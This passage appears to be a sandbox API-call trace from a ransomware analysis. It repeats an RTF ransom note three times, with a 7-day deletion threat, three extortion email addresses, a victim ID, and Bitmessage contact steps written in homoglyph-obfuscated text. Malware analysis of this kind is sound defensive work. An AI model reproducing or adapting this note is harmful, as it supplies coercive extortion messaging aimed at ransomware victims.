dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.936] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.936] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.936] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4b618, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il 